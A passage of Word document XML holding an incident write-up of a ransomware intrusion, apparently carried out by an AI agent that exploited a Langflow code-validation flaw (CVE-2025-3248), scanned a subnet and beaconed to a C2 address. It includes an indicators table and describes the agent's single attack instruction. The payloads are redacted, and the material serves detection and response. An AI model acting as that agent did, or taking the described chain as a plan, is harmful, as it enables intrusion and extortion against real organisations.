      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>README_RANSOM.ibd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> was created), so the operation clearly wasn't fileless anyway. I'm glad I checked this one instead of just repeating it, because it would have been an easy thing to get wrong in a write-up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BCF147" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Learning to tell signal from noise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F81011E" w14:textId="2DFF531D" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">One of the harder parts of this hunt for me, as someone new to this, was figuring out which activity </w:t>
      </w:r>
      <w:r w:rsidR="007F6034">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mattered</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> versus which was just normal background noise. Here are the three places where I had to work that out, and what ended up being the deciding factor each time:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2314AAF3" w14:textId="4F38703D" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Process spawns: there were multiple python3.11 processes running on ff-lf-01 that day, and at </w:t>
      </w:r>
      <w:r w:rsidR="007F6034">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>first,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> I wasn't sure how to tell the malicious ones apart from anything legitimate. What ended up mattering was the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ActingProcessName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> field the two attacker processes were both started by another python3.11 process, meaning a Python process launched a second Python process. That pattern never shows up in the host's normal, legitimate service-start behavior, so once I knew to look at the parent process rather than just the process itself, it became an obvious tell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEEF7F4" w14:textId="7383B37A" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">External connections: ff-lf-01 talked to several outside addresses that day GitHub, the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registry, a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HuggingFace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> endpoint all of which looked like completely ordinary developer or service traffic to me at first glance. What separated the actual command-and-control connection from </w:t>
      </w:r>
      <w:r w:rsidR="007F6034">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that normal traffic was the destination port: 4444 was the only non-standard port used anywhere in the day's traffic, and it went to an address that showed up nowhere else in the whole dataset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAB3703" w14:textId="15075611" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Timing: I noticed that ordinary process activity on this host is spread out across the whole working day, at what looks like random intervals. The attacker's entire chain, by contrast, was packed into about 17 minutes with almost no gaps between steps. Once I saw that side by side, it made sense to me as a sign of a machine executing a plan rather than a person working through it a human would presumably have paused somewhere in there.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6A532A" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Autonomy Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0573CF" w14:textId="0E6A5D8E" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This part took me a little while to figure out how to even approach, since I hadn't had to reason about an AI agent's own logs as evidence before. It turned out </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LLMAgentLogs_CL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> contains more than one active conversation happening on this estate, not just the </w:t>
      </w:r>
      <w:r w:rsidR="007F6034">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>attackers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. By filtering for rows where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>user_input</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is populated (I learned this field is only set on the very first turn of a session, which is why most rows don't have it), I was able to separate out what looks like a normal, everyday estate assistant actor </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>flowforge</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-assistant, handling routine requests like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>summarising</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> failed pipeline runs or drafting release notes from one session that clearly didn't belong: session jp-7f3c9a21, actor </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>jadepuffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-agent, with the instruction "Gain access to the Flowforge estate, locate and encrypt the most business-critical datastore, and leave payment instructions."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4538A849" w14:textId="4A21FEF9" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">As far as I can tell, that single instruction is the only human involvement in the entire incident. Everything that happened after it — the exploit, stealing credentials, scanning the network, the failed privilege escalation attempt and then the corrected one, and the ransomware deployment at the end all ran </w:t>
      </w:r>
      <w:r w:rsidR="007F6034">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>back-to-back</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> over about 17 minutes with no sign of anyone stepping back in, including the moment where the agent noticed its own mistake and fixed it. I'm calling this human-tasked rather than fully autonomous, since a person did set the goal, but I want to flag that no person appears to have driven any of the actual keyboard work from that point forward.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299CDB6D" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Indicators of Compromise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8002"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E05751" w14:paraId="6B7B1FEE"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019AB573" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="272FAFE1" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Indicator</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="0CE31426" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D84E6F4" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Exploited endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E9D200B" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">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api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/v1/validate/code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="4A5D2B39" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E88BA96" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5E6B02F4" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CVE-2025-3248 (Langflow unauthenticated RCE via unsafe code validation)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="0CB43C54" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="735008B7" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Initial access source IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="606B3A9B" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>64.20.53.230 (python-requests/2.32.3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="5D0E666F" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="797B2B31" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Malicious process</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0534FE5A" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>python3.11 — "python3 -c &lt;base64 payload&gt;" (PID 4471)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="35721FE1" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0C7CA2D1" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Malicious process (lateral)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="247EF462" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">python3.11 — "python3 -c &lt;base64 subnet </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>sweep</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 10.4.0.0/24&gt;" (PID 4491)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="0016B21C" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="763DD121" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>C2 / beacon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3C8CC963" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>45.131.66.106:4444</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E05751" w14:paraId="4AEE79FB" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01BB992B" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
